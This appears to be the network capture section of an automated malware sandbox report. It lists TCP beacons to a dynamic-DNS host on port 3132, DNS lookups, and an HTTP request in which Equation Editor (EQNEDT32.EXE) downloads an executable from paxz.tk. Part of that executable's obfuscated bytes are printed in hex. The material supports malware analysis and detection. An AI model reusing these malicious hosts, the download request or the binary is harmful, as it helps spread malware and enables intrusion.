                                                      Jan 24, 2022 15:32:18.755321980 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:19.010658979 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:19.010739088 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:19.314666033 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:19.315891027 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:19.548249006 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:19.548361063 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:19.815118074 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:19.819171906 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:20.095999956 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.096050024 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:20.159136057 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.159703970 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:20.337169886 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.337341070 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:20.455183029 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.455348969 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:20.643256903 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.699574947 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:20.960597038 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:21.189255953 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:21.383688927 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:21.674125910 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:24.007859945 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:24.268096924 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:24.796853065 CET313249171103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:25.063782930 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:27.099423885 CET491713132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:39.867656946 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:40.086188078 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:40.086287022 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:40.087003946 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:40.319797993 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:40.320008039 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:40.584093094 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:40.584255934 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:40.802879095 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:40.803036928 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.084006071 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.084156990 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.365438938 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.365511894 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.413954020 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.414026976 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.583594084 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.583817959 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.695417881 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.695552111 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.711261034 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.867803097 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.867945910 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:41.916697025 CET313249172103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:41.916762114 CET491723132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:45.791032076 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:46.021138906 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:46.021236897 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:46.021979094 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:46.278043985 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:46.278247118 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:46.569725990 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:46.569808006 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:46.806268930 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:46.806643009 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:47.109771013 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:47.109954119 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:47.402568102 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:47.402740002 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:47.466547966 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:47.648035049 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:47.648123026 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:47.764293909 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:47.955178976 CET313249173103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:47.955262899 CET491733132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:51.868711948 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:52.111131907 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:52.111216068 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:52.111741066 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:52.353705883 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:52.353869915 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:52.639358044 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:52.639518023 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:52.870184898 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:52.870264053 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:53.154289007 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:53.154347897 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:53.427712917 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:53.436213017 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:53.436274052 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:32:53.515953064 CET313249174103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:32:53.518981934 CET491743132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:16.430857897 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:16.663746119 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:16.663875103 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:16.666424990 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:16.914186954 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:16.914278984 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:17.225964069 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:17.226130962 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:17.471276999 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:17.471411943 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:17.758039951 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:17.758200884 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.054972887 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.055162907 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.117788076 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.118032932 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.287208080 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.287362099 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.397955894 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.398060083 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.421240091 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.569587946 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.569755077 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:18.627578020 CET313249176103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:18.627681971 CET491763132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:22.510267973 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:22.736763954 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:22.736905098 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:22.745018005 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:22.977705002 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:22.977829933 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:23.257107973 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:23.257242918 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:23.477195978 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:23.477336884 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:23.759776115 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:23.759922981 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:23.975718975 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:24.025950909 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:24.026133060 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:24.104775906 CET313249177103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:24.105063915 CET491773132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.009557009 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.237986088 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:28.241007090 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.241251945 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.481343985 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:28.481607914 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.709378004 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:28.710180998 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:28.984956980 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:29.064275026 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:29.066956997 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:29.295080900 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:29.295552015 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:29.523369074 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:29.523566961 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:29.753216982 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:29.965490103 CET491783132192.168.2.22103.153.78.234
                                                      Jan 24, 2022 15:33:30.157329082 CET313249178103.153.78.234192.168.2.22
                                                      Jan 24, 2022 15:33:30.157422066 CET491783132192.168.2.22103.153.78.234

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 24, 2022 15:31:18.952415943 CET5216753192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:31:18.971262932 CET53521678.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:31:18.971574068 CET5216753192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:31:18.990772009 CET53521678.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:31:33.288619041 CET5059153192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:31:33.307730913 CET53505918.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:31:39.704605103 CET5780553192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:31:39.731273890 CET53578058.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:31:45.854558945 CET5903053192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:31:45.875524044 CET53590308.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:06.034229040 CET5918553192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:06.055263042 CET53591858.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:12.310916901 CET5561653192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:12.330322981 CET53556168.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:18.447238922 CET4997253192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:18.464929104 CET53499728.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:39.846950054 CET5177153192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:39.866324902 CET53517718.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:45.768023014 CET5986753192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:45.788752079 CET53598678.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:32:51.847006083 CET5031553192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:32:51.866321087 CET53503158.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:33:16.410244942 CET5007253192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:33:16.429569006 CET53500728.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:33:22.485915899 CET5430453192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:33:22.506894112 CET53543048.8.8.8192.168.2.22
                                                      Jan 24, 2022 15:33:27.990884066 CET4989453192.168.2.228.8.8.8
                                                      Jan 24, 2022 15:33:28.009027004 CET53498948.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 24, 2022 15:31:18.952415943 CET192.168.2.228.8.8.80xe630Standard query (0)paxz.tkA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:18.971574068 CET192.168.2.228.8.8.80xe630Standard query (0)paxz.tkA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:33.288619041 CET192.168.2.228.8.8.80xbb0cStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:39.704605103 CET192.168.2.228.8.8.80x7163Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:45.854558945 CET192.168.2.228.8.8.80x315aStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:06.034229040 CET192.168.2.228.8.8.80x8bd1Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:12.310916901 CET192.168.2.228.8.8.80x3885Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:18.447238922 CET192.168.2.228.8.8.80x1941Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:39.846950054 CET192.168.2.228.8.8.80x6993Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:45.768023014 CET192.168.2.228.8.8.80xc645Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:51.847006083 CET192.168.2.228.8.8.80xecedStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:16.410244942 CET192.168.2.228.8.8.80x3ef5Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:22.485915899 CET192.168.2.228.8.8.80x5c0cStandard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:27.990884066 CET192.168.2.228.8.8.80xd6a1Standard query (0)vijayikohli1.bounceme.netA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 24, 2022 15:31:18.971262932 CET8.8.8.8192.168.2.220xe630No error (0)paxz.tk2.58.149.41A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:18.990772009 CET8.8.8.8192.168.2.220xe630No error (0)paxz.tk2.58.149.41A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:33.307730913 CET8.8.8.8192.168.2.220xbb0cNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:39.731273890 CET8.8.8.8192.168.2.220x7163No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:31:45.875524044 CET8.8.8.8192.168.2.220x315aNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:06.055263042 CET8.8.8.8192.168.2.220x8bd1No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:12.330322981 CET8.8.8.8192.168.2.220x3885No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:18.464929104 CET8.8.8.8192.168.2.220x1941No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:39.866324902 CET8.8.8.8192.168.2.220x6993No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:45.788752079 CET8.8.8.8192.168.2.220xc645No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:32:51.866321087 CET8.8.8.8192.168.2.220xecedNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:16.429569006 CET8.8.8.8192.168.2.220x3ef5No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:22.506894112 CET8.8.8.8192.168.2.220x5c0cNo error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)
                                                      Jan 24, 2022 15:33:28.009027004 CET8.8.8.8192.168.2.220xd6a1No error (0)vijayikohli1.bounceme.net103.153.78.234A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • paxz.tk

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.22491652.58.149.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 24, 2022 15:31:19.061299086 CET0OUTGET /plugmanzx.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: paxz.tk
                                                      Connection: Keep-Alive
                                                      Jan 24, 2022 15:31:19.088403940 CET2INHTTP/1.1 200 OK
                                                      Date: Mon, 24 Jan 2022 14:31:19 GMT
                                                      Server: Apache
                                                      Last-Modified: Mon, 24 Jan 2022 10:15:50 GMT
                                                      ETag: "73800-5d65140bd6d4a"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 473088
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 7b ee 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2c 07 00 00 0a 00 00 00 00 00 00 8e 4a 07 00 00 20 00 00 00 60 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 4a 07 00 4f 00 00 00 00 60 07 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 2a 07 00 00 20 00 00 00 2c 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 06 00 00 00 60 07 00 00 08 00 00 00 2e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 36 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 4a 07 00 00 00 00 00 48 00 00 00 02 00 05 00 60 b5 06 00 dc 94 00 00 03 00 00 00 30 01 00 06 28 f4 00 00 38 c1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 0e 00 00 00 12 00 00 00 13 00 00 00 02 00 00 00 0e 00 00 00 11 00 00 00 13 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 03 00 07 00 00 00 01 00 00 11 02 7b 0c 00 00 04 2a 00 13 30 04 00 08 00 00 00 01 00 00 11 02 03 7d 0c 00 00 04 2a 13 30 03 00 4e 00 00 00 02 00 00 11 00 20 3d a8 47 f7 20 1b ea ff b9 61 25 0b 1a 5e 45 04 00 00 00 27 00 00 00 18 00 00 00 02 00 00 00 dc ff ff ff 2b 25 02 7b 05 00 00 04 0a 07 20 db 2a cb 8e 5a 20 08 c0 84 ef 61 2b c9 07 20 10 a0 54 ba 5a 20 8f 9e c1 02 61 2b ba 06 2a 00 00 13 30 03 00 3b 00 00 00 02 00 00 11 00 20 54 51 73 d5 20 63 5d 69 db 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 18 00 00 00 02 00 00 00 2b 16 02 7b 0d 00 00 04 0a 07 20 76 01 5f ad 5a 20 77 c1 cc c3 61 2b cd 06 2a 00 13 30 04 00 09 00 00 00 01 00 00 11 00 02 03 7d 0d 00 00 04 2a 00 00 00 13 30 03 00 3b 00 00 00 03 00 00 11 00 02 7b 0a 00 00 04 0a 20 20 9d ef 9f 20 9a 47 4a 91 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 11 00 00 00 2b 0f 07 20 78 7e d8 e6 5a 20 d9 88 8c e4 61 2b d4 06 2a 00 13 30 05 00 d2 01 00 00 01 00 00 11 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 28 21 00 00 0a 20 fd d8 24 0b 20 9d 31 8f 57 61 25 0a 1f 0f 5e 45 0f 00 00 00 2d 01 00 00 14 01 00 00 bf 00 00 00 6c 01 00 00 05 00 00 00 e2 00 00 00 8c 00 00 00 59 01 00 00 a5 00 00 00 22 00 00 00 af ff ff ff 46 01 00 00 4b 00 00 00 69 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{a0,J `@ @<JO` H.text* , `.rsrc `.@@.reloc6@BpJH`0(80*0{*0}*0N =G a%^E'+%{ *Z a+ TZ a+*0; TQs c]ia%^E+{ v_Z wa+*0}*0;{ GJa%^E+ x~Z a+*0}}(! $ 1Wa%^E-lY"FKi
                                                      Jan 24, 2022 15:31:19.088427067 CET3INData Raw: f5 00 00 00 38 67 01 00 00 02 05 7d 03 00 00 04 02 03 7d 02 00 00 04 06 20 80 8c 9b 60 5a 20 70 6b e8 1b 61 2b 92 02 72 01 00 00 70 0f 02 28 22 00 00 0a 28 18 00 00 06 7d 0b 00 00 04 06 20 90 20 f7 77 5a 20 0f 80 14 e4 61 38 69 ff ff ff 02 03 28
                                                      Data Ascii: 8g}} `Z pka+rp("(} wZ a8i(} KZ 1a8K{(} u;Z Z\Xa8(( 7Z a8} +Z ]apa8{(} c`QZ a8 _Z ~B
                                                      Jan 24, 2022 15:31:19.088439941 CET4INData Raw: 07 5a 20 4d 7d f5 b1 61 2b bb 09 2a 00 41 1c 00 00 00 00 00 00 45 00 00 00 cc 02 00 00 11 03 00 00 5e 00 00 00 57 00 00 01 13 30 05 00 44 00 00 00 05 00 00 11 00 20 74 18 2d 03 20 30 cf 49 1e 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00
                                                      Data Ascii: Z M}a+*AE^W0D t- 0Ia%^E+( 1Z 5da+X(*0N iA /a%^E'+%( 81IZ /9la+ tZ a+*0;( U 0
                                                      Jan 24, 2022 15:31:19.088455915 CET6INData Raw: 30 05 00 bd 00 00 00 07 00 00 11 00 20 3e da af 87 20 d0 2a dc a8 61 25 0b 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 22 00 00 00 2b 20 72 35 01 00 70 03 02 7b 0b 00 00 04 28 22 00 00 06 07 20 51 ba 57 bc 5a 20 8c e3 93 68 61 2b c3 00 00 02 7b
                                                      Data Ascii: 0 > *a%^E"+ r5p{(" QWZ ha+{( *a%^E+ Z 3a+6 *a%^E+ L`3Z Xa+*DB6W0; FLV `>a
                                                      Jan 24, 2022 15:31:19.088471889 CET7INData Raw: 00 00 06 09 20 a6 90 36 d5 5a 20 e8 27 ed f5 61 38 3d ff ff ff 00 02 7b 0e 00 00 04 6f 58 00 00 06 09 20 27 e8 d8 b2 5a 20 cf 2f 8e 07 61 38 1f ff ff ff 00 09 20 17 32 6d 95 5a 20 65 2c df d9 61 38 0c ff ff ff 06 16 9a 72 6d 01 00 70 28 2b 00 00
                                                      Data Ascii: 6Z 'a8={oX 'Z /a8 2mZ e,a8rmp(++ -s8i3 gc8, %RwA%+ L%& H#Za8 `Z m.a8*0V% (* C .a%.^E.*7>t
                                                      Jan 24, 2022 15:31:19.088489056 CET9INData Raw: 06 00 00 11 1a 20 3e 07 4e 3b 5a 20 06 a6 3e c5 61 38 79 fb ff ff 00 09 06 11 04 9a 28 2d 00 00 06 26 20 a2 40 53 98 38 63 fb ff ff 02 7b 0e 00 00 04 6f 43 00 00 06 18 fe 01 13 08 11 1a 20 18 6b ed 7a 5a 20 db ce 1a 49 61 38 40 fb ff ff 09 72 a7
                                                      Data Ascii: >N;Z >a8y(-& @S8c{oC kzZ Ia8@rp(-& cYZ a8! $hwZ #[a8 #Z ?a8 &Z yTa88n uZ a8rp(+,+ {8 }|Z a8
